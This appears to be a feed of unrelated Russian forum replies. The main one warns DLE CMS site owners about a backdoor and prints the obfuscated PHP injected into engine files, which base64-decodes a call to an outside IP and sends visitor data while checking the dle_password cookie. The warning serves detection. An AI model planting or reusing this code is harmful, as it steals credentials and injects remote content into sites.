gregzem, Новая болячка dle /ru/forum/778402 Скрипт пока его не видит.
А что мешает потом расшифровать?
Смотрите файлы
engine/modules/topnews.php
engine/init.php
engine/modules/sitelogin.php
на наличие такого кода
function show_all_news($id) { $id = intval($id); $rtn = $id + date("j"); return $rtn; } function mysql_safe($in) { if (show_all_news(64) < 1024) { $rtn = base64_decode($in); return $rtn; } } function get_all_news($newsid) { if (date("j") - $newsid > 320 ) { $rtn = false; } else { //$get = mysql_safe("aHR0cDovLzE3OC4yMTEuMzMuNzQvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);// if (!isset($_COOKIE[mysql_safe("ZGxlX3Bhc3N3b3Jk")])) { echo @file_get_contents($get); } } } get_all_news (date("j"));
Такой же код обнаружил и на версии 9.8. (Лицензия)
Уязвимость во всех версиях движка. Взломщик крадет пароли и отсылает их на ip
178.211.33.74/get_api.php?pid=2&
Картинки не уникализированы, а реально уникальные.
Технически все фотографии выводятся одинаково. Все загружены на свой сервер и у всех есть альт.
Оффтоп. Что за мода пошла, обрабатывать фотографии до неестественных цветов?
Официальный цифры
5205руб. Х 2 Х 26% Х 12 = 32 479,20 рублей. Отчисления в ФФОМС составит - 3 185,46 рублей.
пруф
А оно всем надо?
Одного топика мало?
